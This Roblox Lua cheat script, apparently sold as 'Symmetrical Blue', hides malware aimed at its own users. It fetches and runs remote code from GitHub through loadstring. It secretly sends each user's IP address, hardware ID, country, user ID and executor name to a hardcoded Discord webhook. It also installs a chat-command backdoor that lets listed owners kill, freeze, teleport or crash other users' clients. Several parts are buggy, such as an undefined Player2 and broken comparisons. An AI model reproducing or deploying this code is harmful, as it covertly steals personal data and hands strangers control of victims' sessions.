if getgenv().key == 'LJB&^$KLBVTY)(*&^NKLK' then
loadstring(game:HttpGet("https://raw.githubusercontent.com/01010101010x/010100101/main/LocalAntiBan"))();
else
    game:GetService("Players").LocalPlayer:Kick("Error Connection | Reason : U have Been Blacklisted For Possible Bypass | Contact Lenix For Help |")
    wait(2)
    game:shutdown()
end


local webh = "https://discord.com/api/webhooks/1045159714780090491/rHMUgoYrtsV-T82dEBJVvhBfzh8MT66_dCk9mMa7-YM5xAtRZxJ7XRvBktjmz9FXLB-R"


pcall(function()
   local data = {

  ['embeds'] = {
    {
       ['title'] = ''..game.Players.LocalPlayer.Name.. ' ``Executed Logger 1``',
       ['description'] = '**INFO LOGGER 1**',
       ['type'] = "rich",
       ['color'] = tonumber(16753920),
       ['fields'] = {
          {name = '**Profile Link**', value = ''.."https://www.roblox.com//users/"..game.Players.LocalPlayer.UserId.."/profile"},
          {name = '**Country**', value = game:GetService("LocalizationService"):GetCountryRegionForPlayerAsync(game.Players.LocalPlayer)},
          {name = '**Language**', value = game.Players.LocalPlayer.LocaleId},
          {name = '**Player Account Age**', value = game:GetService("Players").LocalPlayer.AccountAge},
          {name = '**Hardware ID**', value = game:GetService("RbxAnalyticsService"):GetClientId()},
          {name = "**Ping**", value = game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValueString()},
          {name = "**Executor**", value = identifyexecutor()},
        }
    }
  }
}

   if syn then
       local response = syn.request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif request then
       local response = request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif http_request then
       local response = http_request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   end
end)

wait(0.1)


local webh = "https://discord.com/api/webhooks/1045159714780090491/rHMUgoYrtsV-T82dEBJVvhBfzh8MT66_dCk9mMa7-YM5xAtRZxJ7XRvBktjmz9FXLB-R"

local req = http_request or request or (syn and syn.request) 

-- Has Verified Badge :

local req = http_request or request or (syn and syn.request)
local HS = game:GetService("HttpService")
local response = HS:JSONDecode(
    req({
    Url = "https://users.roblox.com/v1/users/"..game.Players.LocalPlayer.UserId
})
.Body)


pcall(function()
   local data = {

  ['embeds'] = {
    {
       ['title'] = ''..game.Players.LocalPlayer.Name..' `` Executed Logger 2``',
       ['description'] = '**INFO LOGGER 2**',
       ['type'] = "rich",
       ['color'] = tonumber(16753920),
       ['fields'] = {
          {name = '**Verified Account : **', value = ''..tostring(response.hasVerifiedBadge)},
          {name = '**IP : **', value = ''..req({ Url = "https://api.ipify.org/", Method = "Get" }).Body},
          {name = '**Years Old : **', value = ''..math.floor(game.Players.LocalPlayer.AccountAge/365*100)/(100)},
          {name = '**User ID : **', value = ''..game.Players.LocalPlayer.UserId},
          {name = '** Security Code :**', value =  '3e4gr5w4crh5tp24ytg4w9tgh40q'},
          {name = "**Game Name : **", value = game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name},
          {name = "**Game place ID**", value = "["..game.PlaceId.."](" .. tostring("https://www.roblox.com/games/" .. game.PlaceId) ..")"},
        }
    }
  }
}

   if syn then
       local response = syn.request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif request then
       local response = request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   elseif http_request then
       local response = http_request(
           {
               Url = webh,
               Method = 'POST',
               Headers = {
                   ['Content-Type'] = 'application/json'
               },
               Body = game:GetService('HttpService'):JSONEncode(data)
           }
       );
   end
end)
loadstring(game:HttpGet("https://raw.githubusercontent.com/01010101010x/010100101/main/LocalAntiBan"))();

loadstring(game:HttpGet("https://raw.githubusercontent.com/01010101010x/010100101/main/UcantusehttpspyLOLNERD"))();

local OwnerList = {
    'ALTTTTTTTTTTTTTTTT44',
    'X3UnknownDevF13',
};
 
local BuyerList = {
    'Warriorsgamerfish',
    'MichaeIMyers2021',
    'NotVeurects',
    'YOSXF_34',
};

spawn(function()
    for _, Player in pairs(game:GetService("Players"):GetPlayers()) do
        if table.find(OwnerList,Player.Name) then
            game:GetService('ReplicatedStorage').DefaultChatSystemChatEvents.SayMessageRequest:FireServer('/w '..Player.Name..' I am using Symmetrical Blue!', 'All');
        end
        if table.find(BuyerList,Player.Name) then
            game:GetService('ReplicatedStorage').DefaultChatSystemChatEvents.SayMessageRequest:FireServer('/w '..Player.Name..' I am using Symmetrical Blue!', 'All');
            print(Player.Name)
        end
    end
end)

--. new point

        function kfc()
            if game.workspace:FindFirstChild("KFC") then
                game.workspace:FindFirstChild("KFC"):Destroy()
            end
            if game.workspace:FindFirstChild("Walmart") then
                game.workspace:FindFirstChild("Walmart"):Destroy()
            end
            if game.workspace:FindFirstChild("Mc Donalds") then
                game.workspace:FindFirstChild("Mc Donalds"):Destroy()
            end
            if game.workspace:FindFirstChild("Burger King") then
                game.workspace:FindFirstChild("Burger King"):Destroy()
            end
            if game.workspace:FindFirstChild("Target") then
                game.workspace:FindFirstChild("Target"):Destroy()
            end
            if game.workspace:FindFirstChild("SevenEleven") then
                game.workspace:FindFirstChild("SevenEleven"):Destroy()
            end
            if game.workspace:FindFirstChild("Arena") then
                game.workspace:FindFirstChild("Arena"):Destroy()
            end
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(615.645264, 98.2000275, 2514.97485)
            wait(.5)
            local model = game:GetObjects("rbxassetid://8087486169")[1]
            e = model:Clone()
            e.Parent = workspace
            e.Name = "KFC"
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = e["KFC"].SpawnLocation.CFrame + Vector3.new(3,3,3)
            e["KFC"].SpawnLocation:Destroy()
            t("")
        end
        
        function walmart()
            if game.workspace:FindFirstChild("KFC") then
                game.workspace:FindFirstChild("KFC"):Destroy()
            end
            if game.workspace:FindFirstChild("Walmart") then
                game.workspace:FindFirstChild("Walmart"):Destroy()
            end
            if game.workspace:FindFirstChild("Mc Donalds") then
                game.workspace:FindFirstChild("Mc Donalds"):Destroy()
            end
            if game.workspace:FindFirstChild("Burger King") then
                game.workspace:FindFirstChild("Burger King"):Destroy()
            end
            if game.workspace:FindFirstChild("Target") then
                game.workspace:FindFirstChild("Target"):Destroy()
            end
            if game.workspace:FindFirstChild("SevenEleven") then
                game.workspace:FindFirstChild("SevenEleven"):Destroy()
            end
            if game.workspace:FindFirstChild("Arena") then
                game.workspace:FindFirstChild("Arena"):Destroy()
            end
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(615.645264, 98.2000275, 2514.97485)
            wait(.5)
            local model = game:GetObjects("rbxassetid://6266121355")[1]
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(33, 4, -130)
            e = model:Clone()
            e.Parent = workspace
            e.Name = "Walmart"
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = e["KFC"].SpawnLocation.CFrame == CFrame.new(61, 26, -269)
            e["KFC"].SpawnLocation:Destroy()
            t("")
        end
        
        function target()
            if game.workspace:FindFirstChild("KFC") then
                game.workspace:FindFirstChild("KFC"):Destroy()
            end
            if game.workspace:FindFirstChild("Walmart") then
                game.workspace:FindFirstChild("Walmart"):Destroy()
            end
            if game.workspace:FindFirstChild("Mc Donalds") then
                game.workspace:FindFirstChild("Mc Donalds"):Destroy()
            end
            if game.workspace:FindFirstChild("Burger King") then
                game.workspace:FindFirstChild("Burger King"):Destroy()
            end
            if game.workspace:FindFirstChild("Target") then
                game.workspace:FindFirstChild("Target"):Destroy()
            end
            if game.workspace:FindFirstChild("SevenEleven") then
                game.workspace:FindFirstChild("SevenEleven"):Destroy()
            end
            if game.workspace:FindFirstChild("Arena") then
                game.workspace:FindFirstChild("Arena"):Destroy()
            end
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(615.645264, 98.2000275, 2514.97485)
            wait(.5)
            local model = game:GetObjects("rbxassetid://6700116748")[1]
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(679, 4, -860)
            e = model:Clone()
            e.Parent = workspace
            e.Name = "Target"
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = e["McDonald's"]["Cash"]["10PercentMaterialMeshQuartered"].CFrame +Vector3.new(0,1,0)
            e["KFC"].SpawnLocation:Destroy()
            t("")
        end
        
        function mcdonalds()
            if game.workspace:FindFirstChild("KFC") then
                game.workspace:FindFirstChild("KFC"):Destroy()
            end
            if game.workspace:FindFirstChild("Walmart") then
                game.workspace:FindFirstChild("Walmart"):Destroy()
            end
            if game.workspace:FindFirstChild("Mc Donalds") then
                game.workspace:FindFirstChild("Mc Donalds"):Destroy()
            end
            if game.workspace:FindFirstChild("Burger King") then
                game.workspace:FindFirstChild("Burger King"):Destroy()
            end
            if game.workspace:FindFirstChild("Target") then
                game.workspace:FindFirstChild("Target"):Destroy()
            end
            if game.workspace:FindFirstChild("SevenEleven") then
                game.workspace:FindFirstChild("SevenEleven"):Destroy()
            end
            if game.workspace:FindFirstChild("Arena") then
                game.workspace:FindFirstChild("Arena"):Destroy()
            end
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(615.645264, 98.2000275, 2514.97485)
            wait(.5)
            local model = game:GetObjects("rbxassetid://10265952000")[1]
            e = model:Clone()
            e.Parent = workspace
            e.Name = "Mc Donalds"
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1338, 125, 61)
        end
        
        function burgerking()
            if game.workspace:FindFirstChild("KFC") then
                game.workspace:FindFirstChild("KFC"):Destroy()
            end
            if game.workspace:FindFirstChild("Walmart") then
                game.workspace:FindFirstChild("Walmart"):Destroy()
            end
            if game.workspace:FindFirstChild("Mc Donalds") then
                game.workspace:FindFirstChild("Mc Donalds"):Destroy()
            end
            if game.workspace:FindFirstChild("Burger King") then
                game.workspace:FindFirstChild("Burger King"):Destroy()
            end
            if game.workspace:FindFirstChild("Target") then
                game.workspace:FindFirstChild("Target"):Destroy()
            end
            if game.workspace:FindFirstChild("SevenEleven") then
                game.workspace:FindFirstChild("SevenEleven"):Destroy()
            end
            if game.workspace:FindFirstChild("Arena") then
                game.workspace:FindFirstChild("Arena"):Destroy()
            end
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(615.645264, 98.2000275, 2514.97485)
            wait(.5)
            local model = game:GetObjects("rbxassetid://4704611108")[1]
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(13, 3, -41)
            e = model:Clone()
            e.Parent = workspace
            e.Name = "Burger King"
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = e["McDonald's"]["Cash"]["10PercentMaterialMeshQuartered"].CFrame +Vector3.new(0,1,0)
            e["KFC"].SpawnLocation:Destroy()
            t("")
        end
        
        function seveneleven()
            if game.workspace:FindFirstChild("KFC") then
                game.workspace:FindFirstChild("KFC"):Destroy()
            end
            if game.workspace:FindFirstChild("Walmart") then
                game.workspace:FindFirstChild("Walmart"):Destroy()
            end
            if game.workspace:FindFirstChild("Mc Donalds") then
                game.workspace:FindFirstChild("Mc Donalds"):Destroy()
            end
            if game.workspace:FindFirstChild("Burger King") then
                game.workspace:FindFirstChild("Burger King"):Destroy()
            end
            if game.workspace:FindFirstChild("Target") then
                game.workspace:FindFirstChild("Target"):Destroy()
            end
            if game.workspace:FindFirstChild("SevenEleven") then
                game.workspace:FindFirstChild("SevenEleven"):Destroy()
            end
            if game.workspace:FindFirstChild("Arena") then
                game.workspace:FindFirstChild("Arena"):Destroy()
            end
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(615.645264, 98.2000275, 2514.97485)
            wait(.5)
            local model = game:GetObjects("rbxassetid://10111879259")[1]
            e = model:Clone()
            e.Parent = workspace
            e.Name = "SevenEleven"
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(-1, 3, 12)
            game.Workspace.SevenEleven.Door:Destroy()
        end
        
        pcall(function()
        for _, Player in pairs(game:GetService("Players"):GetPlayers()) do
            if table.find(BuyerList,Player.Name) then
                pcall(function()
                game.ReplicatedStorage.DefaultChatSystemChatEvents.OnMessageDoneFiltering.OnClientEvent:Connect(function(msg)
                    pcall(function()
                        if msg.Message == ',checkusers' then
                            if msg.FromSpeaker == Player.Name then
                                game:GetService('ReplicatedStorage').DefaultChatSystemChatEvents.SayMessageRequest:FireServer('/w '..Player.Name..' Yes I am indeed using Symmetrical Blue', 'All');
                            end
                        end
                        
                        if msg.Message == ',kill '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'ALTTTTTTTTTTTTTTTT44' or game:GetService("Players").LocalPlayer.Name == 'X3UnknownDevF13' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    game:GetService("Players").LocalPlayer.Character:BreakJoints()
                                end
                            end
                        end 
        
                        if msg.Message == ',kill all' then
                            if msg.FromSpeaker == Player2.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'ALTTTTTTTTTTTTTTTT44' or game:GetService("Players").LocalPlayer.Name == 'X3UnknownDevF13' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    game:GetService("Players").LocalPlayer.Character:BreakJoints()
                                end
                            end
                        end 
                        
                        if msg.Message == ',shutdown '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'ALTTTTTTTTTTTTTTTT44' or game:GetService("Players").LocalPlayer.Name == 'X3UnknownDevF13' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    wait(.9)
                                    game:Shutdown()
                                end
                            end
                        end  
                            
                        if msg.Message == ',shutdown all' then
                            if msg.FromSpeaker == Player2.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'ALTTTTTTTTTTTTTTTT44' or game:GetService("Players").LocalPlayer.Name == 'X3UnknownDevF13' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    wait(.9)
                                    game:Shutdown()
                                end
                            end
                        end

                        if msg.Message == ',bring '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Player.Character.HumanoidRootPart.Position)
                            end
                        end  
                            
                        if msg.Message == ',bring all' then
                            if msg.FromSpeaker == Player2.Name then
                                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Player.Character.HumanoidRootPart.Position)
                            end
                        end

                        if msg.Message == ',kfc '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    kfc()
                                end
                            end
                        end  
        
                        if msg.Message == ',kfc all' then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    kfc()
                                end
                            end
                        end  
        
                        if msg.Message == ',walmart '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    walmart()
                                end
                            end
                        end  
        
                        if msg.Message == ',walmart all' then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    walmart()
                                end
                            end
                        end 
        
                        if msg.Message == ',target '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    target()
                                end
                            end
                        end  
        
                        if msg.Message == ',target all' then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    target()
                                end
                            end
                        end
        
                        if msg.Message == ',mcdonalds '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    mcdonalds()
                                end
                            end
                        end  
        
                        if msg.Message == ',mcdonalds all' then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    mcdonalds()
                                end
                            end
                        end
                        
                        if msg.Message == ',burgerking '..game:GetService("Players").LocalPlayer.Name or msg.Message == ',bking'..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    burgerking()
                                end
                            end
                        end  
        
                        if msg.Message == ',burgerking all' or msg.Message == 'bking all' then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                else
                                    burgerking()
                                end
                            end
                        end
        
                        if msg.Message == ',seveneleven '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                    seveneleven()
                                end
                            end
                        end  
        
                        if msg.Message == ',seveneleven all' then
                            if msg.FromSpeaker == Player.Name then
                                if game:GetService("Players").LocalPlayer.Name == 'NotVeurects' or game:GetService("Players").LocalPlayer.Name == 'EnderwoIf3004' or game:GetService("Players").LocalPlayer.Name == 'Spectuwo' or game:GetService("Players").LocalPlayer.Name == 'YOSXF_34' then
                                    seveneleven()
                                end
                            end
                        end
                    end)
                end)
            end)
            end
        end
        end)
        
        --. new point
        
        pcall(function()
        for _, Player2 in pairs(game:GetService("Players"):GetPlayers()) do
            if table.find(OwnerList,Player2.Name) then
                pcall(function()
                game.ReplicatedStorage.DefaultChatSystemChatEvents.OnMessageDoneFiltering.OnClientEvent:Connect(function(msg)
                    pcall(function()
                        if msg.Message == ',checkusers' then
                            if msg.FromSpeaker == Player2.Name then
                                game:GetService('ReplicatedStorage').DefaultChatSystemChatEvents.SayMessageRequest:FireServer('/w '..Player2.Name..' Yes I am indeed using Symmetrical Blue', 'All');
                            end
                        end
                            
                        if msg.Message == ',kill '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                game:GetService("Players").LocalPlayer.Character:BreakJoints()
                            end
                        end 
        
                        if msg.Message == ',kill all' then
                            if msg.FromSpeaker == Player2.Name then
                                game:GetService("Players").LocalPlayer.Character:BreakJoints()
                            end
                        end 
                        
                        if msg.Message == ',shutdown '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                wait(.9)
                                game:Shutdown()
                            end
                        end  
                            
                        if msg.Message == ',shutdown all' then
                            if msg.FromSpeaker == Player2.Name then
                                wait(.9)
                                game:Shutdown()
                            end
                        end
        
                        if msg.Message == ',freeze '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                Frozen = true
                                repeat wait(1)
                                    game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Anchored = true
                                until Frozen == false
                            end
                        end  
                            
                        if msg.Message == ',freeze all' then
                            if msg.FromSpeaker == Player2.Name then
                                Frozen = true
                                repeat wait(1)
                                    game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Anchored = true
                                until Frozen == false
                            end
                        end
        
                        if msg.Message == ',unfreeze '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                Frozen = false
                                wait(1)
                                game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.Anchored = true
                            end
                        end

                        if msg.Message == ',bring '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Player2.Character.HumanoidRootPart.Position)
                            end
                        end  
                            
                        if msg.Message == ',bring all' then
                            if msg.FromSpeaker == Player2.Name then
                                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Player2.Character.HumanoidRootPart.Position)
                            end
                        end

                        if msg.Message == ',kfc '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                kfc()
                            end
                        end  
        
                        if msg.Message == ',kfc all' then
                            if msg.FromSpeaker == Player2.Name then
                                kfc()
                            end
                        end  
        
                        if msg.Message == ',walmart '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                walmart()
                            end
                        end  
        
                        if msg.Message == ',walmart all' then
                            if msg.FromSpeaker == Player2.Name then
                                walmart()
                            end
                        end 
        
                        if msg.Message == ',target '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                target()
                            end
                        end  
        
                        if msg.Message == ',target all' then
                            if msg.FromSpeaker == Player2.Name then
                                target()
                            end
                        end
        
                        if msg.Message == ',mcdonalds '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                mcdonalds()
                            end
                        end  
        
                        if msg.Message == ',mcdonalds all' then
                            if msg.FromSpeaker == Player2.Name then
                                mcdonalds()
                            end
                        end
                        
                        if msg.Message == ',burgerking '..game:GetService("Players").LocalPlayer.Name or msg.Message == ',bking'..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                burgerking()
                            end
                        end  
        
                        if msg.Message == ',burgerking all' or msg.Message == 'bking all' then
                            if msg.FromSpeaker == Player2.Name then
                                burgerking()
                            end
                        end
        
                        if msg.Message == ',seveneleven '..game:GetService("Players").LocalPlayer.Name then
                            if msg.FromSpeaker == Player2.Name then
                                seveneleven()
                            end
                        end  
        
                        if msg.Message == ',seveneleven all' then
                            if msg.FromSpeaker == Player2.Name then
                                seveneleven()
                            end
                        end
                    end)
                end)
                end)
            end
        end
        end)
